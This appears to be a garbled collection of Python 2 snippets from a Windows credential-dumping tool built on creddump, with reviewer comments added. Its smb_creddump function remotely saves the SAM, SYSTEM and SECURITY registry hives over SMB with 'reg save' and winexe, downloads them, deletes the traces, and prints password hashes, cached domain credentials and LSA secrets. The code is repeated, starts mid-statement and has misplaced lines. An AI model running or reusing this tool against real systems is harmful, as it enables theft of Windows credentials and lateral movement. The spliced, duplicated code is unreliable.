    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[
        0]


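def dump(src, length=8, table=None):
    """Render *src* as a classic hex dump, *length* characters per row.

    Each row reads ``OFFSET   HEX BYTES   PRINTABLE``: a 4-digit hex offset,
    the row's bytes as two-digit hex padded to ``length * 3`` columns, then
    the same bytes passed through *table* so non-printables show as '.'.

    Args:
        src: the string to dump (a byte string in this Python 2 tool).
        length: characters per row; must be >= 1.
        table: translation table for the printable column; when omitted the
            module-level FILTER is used, as before.

    Returns:
        The dump as one multi-line string; '' when *src* is empty.

    Raises:
        ValueError: if *length* < 1 (the previous while/slice loop never
            terminated for length 0).
    """
    if length < 1:
        raise ValueError("length must be >= 1")
    if table is None:
        table = FILTER
    rows = []
    # Step by offset instead of repeatedly re-slicing the remainder, and
    # collect rows for a single join rather than quadratic string +=.
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hexa = ' '.join("%02X" % ord(c) for c in chunk)
        rows.append("%04X   %-*s   %s\n"
                    % (offset, length * 3, hexa, chunk.translate(table)))
    return ''.join(rows)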


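# Command line: <SYSTEM hive> <SECURITY hive> true|false
# argv[3] flags a Vista-or-later hive (per the usage examples above).
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)

# The comparison already yields a bool; the former
# `True if ... else False` conditional was redundant.
vista = sys.argv[3] == "true"
# NOTE(review): vista is computed but not used in the visible code - confirm
# whether get_file_secrets() is meant to receive it as a third argument.

secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    # Parenthesised single-argument print is valid on both Python 2 and 3.
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)

# One entry per secret: its name, then a 16-byte-per-row hex dump.  What is
# printed here is plaintext credential material - keep it out of shared logs
# and session captures.
for k in secrets:
    print(k)
    print(dump(secrets[k], length=16))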
    print "\nExample (Windows Vista/7):"
    print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
    print "\nExample (Windows XP):"
    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]


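def dump(src, length=8, table=None):
    """Render *src* as a classic hex dump, *length* characters per row.

    Each row reads ``OFFSET   HEX BYTES   PRINTABLE``: a 4-digit hex offset,
    the row's bytes as two-digit hex padded to ``length * 3`` columns, then
    the same bytes passed through *table* so non-printables show as '.'.

    Args:
        src: the string to dump (a byte string in this Python 2 tool).
        length: characters per row; must be >= 1.
        table: translation table for the printable column; when omitted the
            module-level FILTER is used, as before.

    Returns:
        The dump as one multi-line string; '' when *src* is empty.

    Raises:
        ValueError: if *length* < 1 (the previous while/slice loop never
            terminated for length 0).
    """
    if length < 1:
        raise ValueError("length must be >= 1")
    if table is None:
        table = FILTER
    rows = []
    # Step by offset instead of repeatedly re-slicing the remainder, and
    # collect rows for a single join rather than quadratic string +=.
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hexa = ' '.join("%02X" % ord(c) for c in chunk)
        rows.append("%04X   %-*s   %s\n"
                    % (offset, length * 3, hexa, chunk.translate(table)))
    return ''.join(rows)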

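# Command line: <SYSTEM hive> <SECURITY hive> true|false
# argv[3] flags a Vista-or-later hive (per the usage examples above).
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)

# The comparison already yields a bool; the former
# `True if ... else False` conditional was redundant.
vista = sys.argv[3] == "true"
# NOTE(review): vista is computed but not used in the visible code - confirm
# whether get_file_secrets() is meant to receive it as a third argument.

secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    # Parenthesised single-argument print is valid on both Python 2 and 3.
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)

# One entry per secret: its name, then a 16-byte-per-row hex dump.  What is
# printed here is plaintext credential material - keep it out of shared logs
# and session captures.
for k in secrets:
    print(k)
    print(dump(secrets[k], length=16))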
def smb_creddump():
	"""
	[-s] <ip> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""
	# Orchestration: save the three registry hives on the target via a batch
	# file, pull them back over SMB, remove them from the target, then parse
	# the local copies with creddump.  Every step goes through the
	# smbclient()/winexe() helpers and none of their results is checked, so
	# the statement order below is load-bearing and a failed step only shows
	# up in the helpers' own output.

	try:
		sys.path.insert(0, BASEDIR + '/creddump')
		from framework.win32 import hashdump, domcachedump, lsasecrets
	except:
		# NOTE(review): bare except.  If text(..., 1) does not terminate the
		# run, hashdump/domcachedump/lsasecrets stay unbound and the calls
		# further down raise NameError - confirm text()'s exit semantics.
		text("[!] Error: Creddump dependency missing.", 1)

	set_creds(3)  # presumably loads/prompts for the SMB credentials - see set_creds

	text("[*] Extracting hives...")

	# Fixed, predictable path in a world-writable directory: on a shared
	# operator host a pre-existing file or symlink here is followed by the
	# open() below; tempfile.mkstemp() would avoid that.
	tmpfile = '/tmp/cred_run.bat'

	# Batch file executed on the target: saves HKLM\SAM, \SYSTEM and
	# \SECURITY into \windows\temp (deleted again further down).  For
	# defenders, `reg save` of these three hives is a high-signal event
	# worth alerting on.
	bat = ['@echo off', 'cd \\windows\\temp', 
		'reg save HKLM\\SAM sam.hive /y',
		'reg save HKLM\\SYSTEM system.hive /y',
		'reg save HKLM\\SECURITY security.hive /y']

	# The file object is never closed explicitly; this relies on CPython
	# refcounting to flush it before the smbclient put below.
	open(tmpfile, 'w').write('\r\n'.join(bat))

	smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
	print winexe('\\windows\\temp\\cred_run.bat')

	# Local copies land in the current directory as
	# <ip>_{sam,system,security}.hive and are never removed; they contain
	# credential material and need the same care as the output below.
	text("[*] Downloading hives...")
	smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])

	text("[*] Removing temp files...")
	smbclient('del "\\windows\\temp\\cred_run.bat"')
	smbclient('del "\\windows\\temp\\sam.hive"')
	smbclient('del "\\windows\\temp\\system.hive"')
	smbclient('del "\\windows\\temp\\security.hive"')
	os.unlink(tmpfile)

	# Return values of the two dump_file_hashes() calls are discarded;
	# presumably they print their own results - confirm in creddump.
	text("[*] Extracting SAM credentials...")
	hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')

	text("[*] Extracting MSCASH credentials...")
	domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

	# Code below ripped from creddump's lsadump.py
	text("[*] Extracting LSA Secrets...")
	try:
		# Printable table for the hex dump: byte values whose repr() is three
		# characters (a quoted plain printable) pass through, all others
		# become '.'.
		FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
		secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

		if not secrets:
			text("[!] Unable to read LSA secrets.")

		else:
			# Inline 16-bytes-per-row hex dump of each secret, printed to
			# stdout as plaintext credential material.
			for k in secrets:
				N = 0
				length = 16
				result = ''
				while secrets[k]:
					# Consumes the value in place; secrets[k] is '' afterwards.
					s, secrets[k] = secrets[k][:length],secrets[k][length:]
					hexa = ' '.join(["%02X" % ord(x) for x in s])
					s = s.translate(FILTER)
					result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
					N += length
				
				print k
				print result
	except:
		# NOTE(review): swallows every failure of the LSA step silently
		# (missing hive, parse error, a NameError from the import failure
		# above); it should at least be reported through text().
		pass

	text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
from framework.win32.lsasecrets import get_file_secrets

# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812

# Translation table for dump(): byte values whose repr() is exactly three
# characters (a quoted plain printable) pass through unchanged; every other
# value is rendered as '.'.
FILTER = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))

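def dump(src, length=8, table=None):
    """Render *src* as a classic hex dump, *length* characters per row.

    Each row reads ``OFFSET   HEX BYTES   PRINTABLE``: a 4-digit hex offset,
    the row's bytes as two-digit hex padded to ``length * 3`` columns, then
    the same bytes passed through *table* so non-printables show as '.'.

    Args:
        src: the string to dump (a byte string in this Python 2 tool).
        length: characters per row; must be >= 1.
        table: translation table for the printable column; when omitted the
            module-level FILTER is used, as before.

    Returns:
        The dump as one multi-line string; '' when *src* is empty.

    Raises:
        ValueError: if *length* < 1 (the previous while/slice loop never
            terminated for length 0).
    """
    if length < 1:
        raise ValueError("length must be >= 1")
    if table is None:
        table = FILTER
    rows = []
    # Step by offset instead of repeatedly re-slicing the remainder, and
    # collect rows for a single join rather than quadratic string +=.
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hexa = ' '.join("%02X" % ord(c) for c in chunk)
        rows.append("%04X   %-*s   %s\n"
                    % (offset, length * 3, hexa, chunk.translate(table)))
    return ''.join(rows)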

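# Command line: <bootkey as hex> <SECURITY hive>
if len(sys.argv) < 3:
    # Parenthesised single-argument print is valid on both Python 2 and 3.
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    sys.exit(1)

# The bootkey arrives as a hex string.  A malformed one (odd length,
# non-hex digit) used to surface as a bare traceback from the hex codec
# (TypeError in Python 2; ValueError-based in binascii) instead of usage.
try:
    bootkey = sys.argv[1].decode("hex")
except (TypeError, ValueError):
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    print("Bootkey must be a hex string (even length, hex digits only).")
    sys.exit(1)

secrets = get_file_secrets(bootkey, sys.argv[2])
if not secrets:
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)

# One entry per secret: its name, then a 16-byte-per-row hex dump.  What is
# printed here is plaintext credential material - keep it out of shared logs
# and session captures.
for k in secrets:
    print(k)
    print(dump(secrets[k], length=16))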

# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812

# Translation table for dump(): byte values whose repr() is exactly three
# characters (a quoted plain printable) pass through unchanged; every other
# value is rendered as '.'.
FILTER = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))


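def dump(src, length=8, table=None):
    """Render *src* as a classic hex dump, *length* characters per row.

    Each row reads ``OFFSET   HEX BYTES   PRINTABLE``: a 4-digit hex offset,
    the row's bytes as two-digit hex padded to ``length * 3`` columns, then
    the same bytes passed through *table* so non-printables show as '.'.

    Args:
        src: the string to dump (a byte string in this Python 2 tool).
        length: characters per row; must be >= 1.
        table: translation table for the printable column; when omitted the
            module-level FILTER is used, as before.

    Returns:
        The dump as one multi-line string; '' when *src* is empty.

    Raises:
        ValueError: if *length* < 1 (the previous while/slice loop never
            terminated for length 0).
    """
    if length < 1:
        raise ValueError("length must be >= 1")
    if table is None:
        table = FILTER
    rows = []
    # Step by offset instead of repeatedly re-slicing the remainder, and
    # collect rows for a single join rather than quadratic string +=.
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hexa = ' '.join("%02X" % ord(c) for c in chunk)
        rows.append("%04X   %-*s   %s\n"
                    % (offset, length * 3, hexa, chunk.translate(table)))
    return ''.join(rows)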


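# Command line: <bootkey as hex> <SECURITY hive>
if len(sys.argv) < 3:
    # Parenthesised single-argument print is valid on both Python 2 and 3.
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    sys.exit(1)

# The bootkey arrives as a hex string.  A malformed one (odd length,
# non-hex digit) used to surface as a bare traceback from the hex codec
# (TypeError in Python 2; ValueError-based in binascii) instead of usage.
try:
    bootkey = sys.argv[1].decode("hex")
except (TypeError, ValueError):
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    print("Bootkey must be a hex string (even length, hex digits only).")
    sys.exit(1)

secrets = get_file_secrets(bootkey, sys.argv[2])
if not secrets:
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)

# One entry per secret: its name, then a 16-byte-per-row hex dump.  What is
# printed here is plaintext credential material - keep it out of shared logs
# and session captures.
for k in secrets:
    print(k)
    print(dump(secrets[k], length=16))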
def smb_creddump():
    """
	[-s] <ip/file/range> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""
    # Orchestration: save the three registry hives on the target via a batch
    # file, pull them back over SMB, remove them from the target, then parse
    # the local copies with creddump.  Every step goes through the
    # smbclient()/winexe() helpers and none of their results is checked, so
    # the statement order below is load-bearing and a failed step only shows
    # up in the helpers' own output.

    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except:
        # NOTE(review): bare except.  If text(..., 1) does not terminate the
        # run, hashdump/domcachedump/lsasecrets stay unbound and the calls
        # further down raise NameError - confirm text()'s exit semantics.
        text("[!] Error: Creddump dependency missing.", 1)

    set_creds(3)  # presumably loads/prompts for the SMB credentials - see set_creds

    text("[*] %s Extracting hives..." % (CONF["smb_ip"]))

    # Per-target but still predictable name in a world-writable directory:
    # on a shared operator host a pre-existing file or symlink at this path
    # is followed by the open() below; tempfile.mkstemp() would avoid that.
    tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])

    # Batch file executed on the target: saves HKLM\SAM, \SYSTEM and
    # \SECURITY into \windows\temp (deleted again further down).  For
    # defenders, `reg save` of these three hives is a high-signal event
    # worth alerting on.
    bat = [
        '@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y'
    ]

    # The file object is never closed explicitly; this relies on CPython
    # refcounting to flush it before the smbclient put below.
    open(tmpfile, 'w').write('\r\n'.join(bat))

    smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
    text("[*] %s Running cred_run.bat\n%s\n" %
         (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))

    # Local copies land in the current directory as
    # <ip>_{sam,system,security}.hive and are never removed; they contain
    # credential material and need the same care as the output below.
    text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
    smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' %
              CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' %
              CONF['smb_ip'])

    text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
    smbclient('del "\\windows\\temp\\cred_run.bat"')
    smbclient('del "\\windows\\temp\\sam.hive"')
    smbclient('del "\\windows\\temp\\system.hive"')
    smbclient('del "\\windows\\temp\\security.hive"')
    os.unlink(tmpfile)

    # assumes dump_file_hashes() returns an iterable of str (joined below)
    # - TODO confirm against creddump
    text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
    hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                       CONF['smb_ip'] + '_sam.hive')

    text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
    mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                           CONF['smb_ip'] + '_security.hive')

    # Everything below goes through text() to stdout as plaintext credential
    # material; keep session captures and shared logs in mind.
    text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
    text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))

    # Code below ripped from creddump's lsadump.py
    text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
    try:
        # Printable table for the hex dump: byte values whose repr() is three
        # characters (a quoted plain printable) pass through, all others
        # become '.'.
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
                          for x in range(256)])
        secrets = lsasecrets.get_file_secrets(
            CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

        if not secrets:
            text("[!] %s Error(smb_creddump): Unable to read LSA secrets." %
                 (CONF["smb_ip"]))

        else:

            # NOTE(review): this rebinds `secrets` from the dict returned
            # above to an empty list, so the for loop below never iterates,
            # the two append() calls are unreachable and the LSA section
            # printed at the end is always empty.  The decoded dict is lost
            # here; the output list needs its own name.
            secrets = []

            for k in secrets:
                N = 0
                length = 16
                result = ''
                while secrets[k]:
                    # Consumes the value in place; secrets[k] is '' afterwards.
                    s, secrets[k] = secrets[k][:length], secrets[k][length:]
                    hexa = ' '.join(["%02X" % ord(x) for x in s])
                    s = s.translate(FILTER)
                    result += "%04X   %-*s   %s\n" % (N, length * 3, hexa, s)
                    N += length

                secrets.append(k)
                secrets.append(result)

            text("[*] %s LSA Secrets\n%s" %
                 (CONF["smb_ip"], "\n".join(secrets)))
    except:
        # NOTE(review): swallows every failure of the LSA step silently
        # (missing hive, parse error, a NameError from the import failure
        # above); it should at least be reported through text().
        pass

    text(
        "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
        % (CONF["smb_ip"]))